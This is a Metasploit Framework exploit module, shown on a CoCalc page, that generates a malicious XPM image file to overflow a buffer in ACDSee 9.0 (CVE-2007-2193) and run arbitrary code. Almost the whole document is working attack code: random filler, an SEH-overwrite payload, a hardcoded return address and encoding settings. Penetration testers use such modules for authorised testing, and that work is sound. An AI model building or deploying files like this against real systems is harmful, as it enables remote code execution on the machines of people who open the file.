Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/acdsee_xpm.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::FILEFORMAT

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'ACDSee XPM File Section Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a buffer overflow in ACDSee 9.0.

19
          When viewing a malicious XPM file with the ACDSee product,

20
          a remote attacker could overflow a buffer and execute

21
          arbitrary code.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => 'MC',

25
        'References' => [

26
          [ 'CVE', '2007-2193' ],

27
          [ 'OSVDB', '35236' ],

28
          [ 'BID', '23620' ],

29
        ],

30
        'DefaultOptions' => {

31
          'EXITFUNC' => 'process',

32
          'DisablePayloadHandler' => true,

33
          'AllowWin32SEH' => true

34
        },

35
        'Payload' => {

36
          'Space' => 750,

37
          'BadChars' => "\x00",

38
          'StackAdjustment' => -3500,

39
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,

40
          'DisableNops' => true,

41
        },

42
        'Platform' => 'win',

43
        'Targets' => [

44
          [ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],

45
        ],

46
        'Privileged' => false,

47
        'DisclosureDate' => '2007-11-23',

48
        'DefaultTarget' => 0,

49
        'Notes' => {

50
          'Reliability' => UNKNOWN_RELIABILITY,

51
          'Stability' => UNKNOWN_STABILITY,

52
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

53
        }

54
      )

55
    )

56


57
    register_options(

58
      [

59
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.xpm']),

60
      ]

61
    )

62
  end

63


64
  def exploit

65
    filler = rand_text_alpha_upper(rand(25) + 1)

66


67
    # http://www.fileformat.info/format/xpm/

68
    head = "/* XPM */\r\n"

69
    head << "static char * #{filler}[] = {\r\n"

70
    head << "\""

71


72
    buff = rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)

73


74
    foot = "\",\r\n" + "};\r\n"

75


76
    xpm = head + buff + foot

77


78
    print_status("Creating '#{datastore['FILENAME']}' file ...")

79


80
    file_create(xpm)

81
  end

82
end

83


84